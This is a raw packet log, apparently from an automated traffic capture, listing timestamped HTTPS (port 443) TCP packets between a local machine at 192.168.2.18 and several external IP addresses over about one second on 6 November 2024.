                                                                                                                                              Nov 6, 2024 16:55:24.143996954 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.144013882 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.144033909 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.144896984 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.144912958 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.144979000 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.144984961 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.145029068 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.145205021 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.145224094 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.145275116 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.145281076 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.145319939 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.145755053 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.145777941 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.145844936 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.145849943 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.145884037 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.145893097 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.145898104 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.145936966 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.145936966 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.145955086 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.145965099 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.145968914 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.146002054 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.146033049 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.146037102 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.146049976 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.146087885 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.146569014 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.146584988 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.192590952 CET44349749104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.192841053 CET49749443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:24.192863941 CET44349749104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.193852901 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.193875074 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.193943977 CET44349749104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.193943977 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.193964958 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.194027901 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.194027901 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.194031954 CET49749443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:24.194291115 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.194313049 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.194339037 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.194372892 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.194379091 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.194391012 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.194428921 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.195379972 CET49749443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:24.195461035 CET44349749104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.195606947 CET49749443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:24.195622921 CET44349749104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.196225882 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.196254969 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.196297884 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.196307898 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.196342945 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.196362019 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.197048903 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.197066069 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.197104931 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.197113037 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.197138071 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.197155952 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.197271109 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.197288036 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.197325945 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.197333097 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.197359085 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.197375059 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.197530985 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.197556019 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.197587967 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.197593927 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.197618961 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.197638988 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.197973013 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.198026896 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.198026896 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.198041916 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.198077917 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.198093891 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.220554113 CET49753443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.220607996 CET44349753159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.220690012 CET49753443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.221112013 CET49753443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.221137047 CET44349753159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.236114025 CET49749443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:24.312614918 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.312649012 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.312695980 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.312716007 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.312730074 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.312752008 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.313127041 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.313144922 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.313184977 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.313206911 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.313215971 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.313226938 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.313306093 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.314146042 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.331929922 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.331954002 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.345920086 CET44349749104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.346082926 CET44349749104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.346147060 CET49749443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:24.362581015 CET49749443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:24.362613916 CET44349749104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.389050007 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.389087915 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.389166117 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.389409065 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.389425039 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.410984039 CET49755443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:24.411031961 CET44349755104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.411106110 CET49755443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:24.415119886 CET49755443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:24.415143013 CET44349755104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.431075096 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.432466030 CET49750443192.168.2.1818.66.147.68
                                                                                                                                              Nov 6, 2024 16:55:24.432477951 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.433566093 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.433635950 CET49750443192.168.2.1818.66.147.68
                                                                                                                                              Nov 6, 2024 16:55:24.434704065 CET49750443192.168.2.1818.66.147.68
                                                                                                                                              Nov 6, 2024 16:55:24.434770107 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.436372995 CET49750443192.168.2.1818.66.147.68
                                                                                                                                              Nov 6, 2024 16:55:24.436391115 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.444966078 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.445046902 CET49748443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:55:24.450768948 CET49748443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:55:24.450794935 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.451061964 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.453535080 CET49748443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:55:24.465970993 CET49756443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.466016054 CET44349756159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.466110945 CET49756443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.466342926 CET49757443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.466379881 CET44349757159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.466437101 CET49757443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.466677904 CET49758443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.466689110 CET44349758159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.466743946 CET49758443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.466967106 CET49756443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.466979980 CET44349756159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.467149973 CET49757443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.467164040 CET44349757159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.467293024 CET49758443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.467304945 CET44349758159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.490142107 CET49750443192.168.2.1818.66.147.68
                                                                                                                                              Nov 6, 2024 16:55:24.495337963 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.611567020 CET44349752169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.611871958 CET49752443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:24.611884117 CET44349752169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.612978935 CET44349752169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.613075972 CET49752443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:24.614409924 CET49752443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:24.614475012 CET44349752169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.614590883 CET49752443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:24.614598036 CET44349752169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.666121960 CET49752443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:24.760438919 CET44349752169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.760601997 CET44349752169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.760765076 CET49752443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:24.761487007 CET49752443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:24.761507988 CET44349752169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.764607906 CET49759443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:24.764641047 CET44349759169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.764725924 CET49759443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:24.765417099 CET49759443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:24.765433073 CET44349759169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.775837898 CET49760443192.168.2.18169.150.221.147
                                                                                                                                              Nov 6, 2024 16:55:24.775866032 CET44349760169.150.221.147192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.775974989 CET49760443192.168.2.18169.150.221.147
                                                                                                                                              Nov 6, 2024 16:55:24.776247025 CET49760443192.168.2.18169.150.221.147
                                                                                                                                              Nov 6, 2024 16:55:24.776258945 CET44349760169.150.221.147192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.801095963 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.801125050 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.801134109 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.801153898 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.801167011 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.801175117 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.801199913 CET49750443192.168.2.1818.66.147.68
                                                                                                                                              Nov 6, 2024 16:55:24.801220894 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.801234961 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.801244020 CET49750443192.168.2.1818.66.147.68
                                                                                                                                              Nov 6, 2024 16:55:24.801275969 CET49750443192.168.2.1818.66.147.68
                                                                                                                                              Nov 6, 2024 16:55:24.801282883 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.801307917 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.801331997 CET49750443192.168.2.1818.66.147.68
                                                                                                                                              Nov 6, 2024 16:55:24.801359892 CET49750443192.168.2.1818.66.147.68
                                                                                                                                              Nov 6, 2024 16:55:24.802185059 CET49750443192.168.2.1818.66.147.68
                                                                                                                                              Nov 6, 2024 16:55:24.802201033 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.807255983 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.807281971 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.807296991 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.807363033 CET49748443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:55:24.807377100 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.807425976 CET49748443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:55:24.808706999 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.808747053 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.808775902 CET49748443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:55:24.808782101 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.808815002 CET49748443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:55:24.809881926 CET49748443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:55:24.809892893 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.809901953 CET49748443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:55:24.810054064 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.810090065 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.810137033 CET49748443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:55:25.076994896 CET44349755104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.077442884 CET49755443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:25.077474117 CET44349755104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.078511000 CET44349755104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.078604937 CET49755443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:25.079039097 CET49755443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:25.079102993 CET44349755104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.079391003 CET49755443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:25.079402924 CET44349755104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.114640951 CET44349753159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.114938021 CET49753443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.114950895 CET44349753159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.116106033 CET44349753159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.116195917 CET49753443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.117170095 CET49753443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.117250919 CET44349753159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.117336035 CET49753443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.117341995 CET44349753159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.126113892 CET49755443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:25.158118963 CET49753443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.255388975 CET44349755104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.255546093 CET44349755104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.255613089 CET49755443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:25.257780075 CET49755443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:25.257801056 CET44349755104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.271307945 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.272250891 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.272264957 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.273680925 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.273760080 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.274133921 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.274207115 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.274317026 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.274326086 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.318114042 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.365433931 CET44349758159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.365700006 CET49758443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.365710020 CET44349758159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.366439104 CET44349757159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.366672993 CET49757443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.366692066 CET44349757159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.366833925 CET44349758159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.366893053 CET49758443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.367062092 CET44349757159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.367291927 CET49758443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.367373943 CET44349758159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.367532969 CET44349756159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.367727041 CET49757443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.367842913 CET44349757159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.367963076 CET49756443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.367969990 CET44349756159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.368084908 CET49758443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.368092060 CET44349758159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.368252993 CET49757443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.368388891 CET44349756159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.368717909 CET49756443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.368777037 CET44349756159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.368870974 CET49756443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.413115978 CET49758443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.415318966 CET44349756159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.415335894 CET44349757159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.420140028 CET44349759169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.420397997 CET49759443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:25.420413971 CET44349759169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.421530962 CET44349759169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.421603918 CET49759443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:25.421889067 CET49759443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:25.421958923 CET44349759169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.422034979 CET49759443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:25.422044039 CET44349759169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.466706991 CET49761443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:55:25.466752052 CET44349761142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.466854095 CET49761443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:55:25.467037916 CET49761443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:55:25.467058897 CET44349761142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.473711014 CET44349760169.150.221.147192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.473942995 CET49760443192.168.2.18169.150.221.147
                                                                                                                                              Nov 6, 2024 16:55:25.473964930 CET44349760169.150.221.147192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.475065947 CET44349760169.150.221.147192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.475143909 CET49760443192.168.2.18169.150.221.147
                                                                                                                                              Nov 6, 2024 16:55:25.475492001 CET49760443192.168.2.18169.150.221.147
                                                                                                                                              Nov 6, 2024 16:55:25.475565910 CET44349760169.150.221.147192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.475673914 CET49760443192.168.2.18169.150.221.147
                                                                                                                                              Nov 6, 2024 16:55:25.475697041 CET44349760169.150.221.147192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.477109909 CET49759443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:25.516132116 CET44349753159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.516176939 CET44349753159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.516187906 CET44349753159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.516207933 CET44349753159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.516237020 CET44349753159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.516264915 CET49753443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.516285896 CET44349753159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.516323090 CET49753443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.516344070 CET49753443192.168.2.18159.69.48.31
